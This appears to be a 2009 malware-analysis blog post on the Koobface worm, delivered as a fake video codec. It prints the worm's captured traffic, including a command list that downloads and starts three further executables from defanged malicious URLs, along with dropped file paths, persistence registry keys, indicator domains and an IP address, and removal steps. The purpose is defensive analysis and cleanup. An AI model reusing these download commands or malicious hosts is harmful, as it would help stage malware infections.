Worm.Win32.Koobface

Posted by on Friday, April 17th, 2009  |  7,938 views

A user sent us another false video codec downloaded from a false movie website, that was using fake flash movies to push the user to download the false codec.

Once executed the program, it generates the following Internet traffic:

1
2
3
4
5
6
7
8
9
10
11
12

POST /achcheck.php HTTP/1.1
Host: nua06032009.biz
 
POST /ld/gen.php HTTP/1.1
Host: nua06032009.biz
#PID=8000
STARTONCE|hxxp://stanishev.com/1/pch4.exe
START|hxxp://stanishev.com/1/nfr.exe
STARTONCE|hxxp://stanishev.com/1/pp.06.exe
WAIT|120
#BLACKLABEL
EXIT

In the above traffic the malware is trying to download and install in the victim’s computer three new and different malware samples. Following there are the files created in the system after the download of the three URLs:

1
2
3
4
5
6
7
8
9
10

C:\WINDOWS\ld08.exe
C:\353454543.bat
%User%\LOCALS~1\Temp\jopaxx_xx40040395.exe
C:\WINDOWS\st_xx40038948.exe
C:\dll32.bat
%User%\LOCALS~1\Temp\jopaxx_1240028657.exe
C:\WINDOWS\system32\dll32.exe 
C:\WINDOWS\9g2234wesdf3dfgjf23 
C:\WINDOWS\pp06.exe
C:\355674543.bat

Note that a new .bat file was dropped in C:\ and then executed by the malware and these files were deleted:

1
2
3
4

%User%\LOCALS~1\Temp\JOPAXX~2.EXE
C:\355674~1.BAT
C:\WINDOWS\ST_124~1.EXE
C:\dll32.bat

Running processes:

Screenshot of running processes

The program generates the following Internet traffic:

1
2
3
4

GET /v50/search.php?p=10005&s=I&v=57&uid=-XXXXXXXXX&q= HTTP/1.1
User-Agent: 
Host: 85.13.236.154
Referer:

Symptoms that can be noticed in an HiJackThis log:

1
2
3
4
5
6
7
8
9
10

c:\windows\ld08.exe
%User%\LOCALS~1\Temp\jopaxx_1240040395.exe
c:\windows\pp06.exe
C:\WINDOWS\System32\dll32.exe
 
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = http=localhost:7171
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local;<local>
O4 - HKLM\..\Run: [sysldtray] c:\windows\ld08.exe
O4 - HKLM\..\Run: [pp] c:\windows\pp06.exe
O4 - HKCU\..\Run: [dll32] dll32

How to remove this malware ?

1) Kill all the malicious running processes and remove the files, in my case:

1
2
3
4

ld08.exe
pp06.exe
dll32.exe
jopaxx_1240040395.exe

2) Delete malicious registry keys, in my case:

1
2
3

O4 - HKLM\..\Run: [sysldtray] c:\windows\ld08.exe
O4 - HKLM\..\Run: [pp] c:\windows\pp06.exe
O4 - HKCU\..\Run: [dll32] dll32

3) Block malicious IPs and domains, in my case:

1
2
3

nua06032009.biz
stanishev.com
85.13.236.154 (85.13.236.154.reverse.coreix.net)

4) Update your AntiVirus and do a full system scan

5) Scan your system with NoVirusThanks Malware Remover

Posted by on Friday, April 17th, 2009 at 6:55 pm and filed under Malware Analysis with tags , . You can skip to the end and leave a response. Pinging is currently not allowed.

Random Posts

Previous Posts